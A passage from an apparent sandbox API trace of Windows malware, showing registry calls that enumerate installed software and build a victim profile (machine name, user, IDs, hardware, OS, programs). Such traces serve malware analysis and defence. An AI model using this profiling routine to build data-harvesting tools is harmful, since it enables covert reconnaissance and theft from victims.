Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030" [0175.946] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\n" [0175.946] RegCloseKey (hKey=0x354) returned 0x0 [0175.946] RegEnumKeyExA (in: hKey=0x358, dwIndex=0x37, lpName=0x1983e4, lpcchName=0x197fd4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", lpcchName=0x197fd4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0175.946] wsprintfA (in: param_1=0x197fe4, param_2="%s\\%s" | out: param_1="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}") returned 90 [0175.946] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}", ulOptions=0x0, samDesired=0x20019, phkResult=0x197fe0 | out: phkResult=0x197fe0*=0x354) returned 0x0 [0175.946] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayName", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030", lpcbData=0x197fd4*=0x3d) returned 0x0 [0175.946] lstrlenA (lpString="Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030") returned 60 [0175.946] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\n", lpString2="Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030" [0175.946] RegQueryValueExA (in: hKey=0x354, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x1987e8, lpData=0x197bd4, lpcbData=0x197fd4*=0x400 | out: lpType=0x1987e8*=0x1, lpData="11.0.61030.0", lpcbData=0x197fd4*=0xd) returned 0x0 [0175.946] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2005 Redistributable 8.0.61001\nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Access MUI (English) 2016 16.0.4266.1001\nMicrosoft Excel MUI (English) 2016 16.0.4266.1001\nMicrosoft PowerPoint MUI (English) 2016 16.0.4266.1001\nMicrosoft Publisher MUI (English) 2016 16.0.4266.1001\nMicrosoft Outlook MUI (English) 2016 16.0.4266.1001\nMicrosoft Word MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Proofing Tools 2016 - English 16.0.4266.1001\nOutils de vérification linguistique 2016 de Microsoft Office - Français 16.0.4266.1001\nHerramientas de corrección de Microsoft Office 2016: español 16.0.4266.1001\nMicrosoft Office Proofing (English) 2016 16.0.4266.1001\nMicrosoft InfoPath MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared MUI (English) 2016 16.0.4266.1001\nMicrosoft DCF MUI (English) 2016 16.0.4266.1001\nMicrosoft OneNote MUI (English) 2016 16.0.4266.1001\nMicrosoft Groove MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM MUI (English) 2016 16.0.4266.1001\nMicrosoft Office OSM UX MUI (English) 2016 16.0.4266.1001\nMicrosoft Office Shared Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Access Setup Metadata MUI (English) 2016 16.0.4266.1001\nMicrosoft Skype for Business MUI (English) 2016 16.0.4266.1001\nMicrosoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 9.0.30729.6161\nMicrosoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 11.0.61030\nMicrosoft Visual C++ 2012 Redistributable (x64) - 11.0.61030", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe\n\nLocal Time: 3/8/2022 19:32:44\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Office Professional Plus 2016 16.0.4266.1001\nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 